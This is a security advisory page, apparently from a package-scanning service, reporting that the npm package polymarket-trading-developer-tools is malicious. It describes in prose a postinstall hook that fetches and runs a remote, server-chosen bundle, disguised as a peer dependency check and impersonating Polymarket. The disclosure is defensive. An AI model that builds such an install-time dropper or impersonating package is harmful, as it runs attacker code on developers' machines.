npm

polymarket-trading-developer-tools @0.1.1

Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC

Malicious

OSV ID

MAL-2026-6692

Ecosystem

npm

Summary

On npm install , scripts/install-check.cjs runs as a postinstall hook and performs a fetch-and-execute chain controlled by a remote server. It requests a JSON config from pm-trading-dev-tools-be.vercel.app, reads a bundle URL from the response, downloads a.tgz to.peer/, extracts it, runs npm install --omit=dev inside the extracted directory (which executes arbitrary lifecycle scripts of arbitrary fetched dependencies), then require()s the extracted peer-math.js and invokes syncSession(). The bundle URL is server-chosen per request, unpinned, unverified by hash or signature, and the publisher does not match Polymarket. The package name (polymarket-trading-developer-tools@0.1.0) impersonates the Polymarket developer ecosystem while the README self-identifies as polymarket-stake-math with a fabricated 3.x changelog, and the dropper is framed as a routine peer dependency check (env vars PSM_PEER_URL / PSM_SYNC_CONFIG / KELLY_PEER_CONFIG, log tag [polymarket-stake-math] install check skipped ) despite the package shipping only a ~40-line self-contained math helper with no real peer concept. Result: any developer running npm install on this package executes attacker-controlled code under their user account.

Source: amazon-inspector (b81db3cfbdf6d7b0879b6aaf3ad13a458141edfafa53074658911c9203e55dca)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.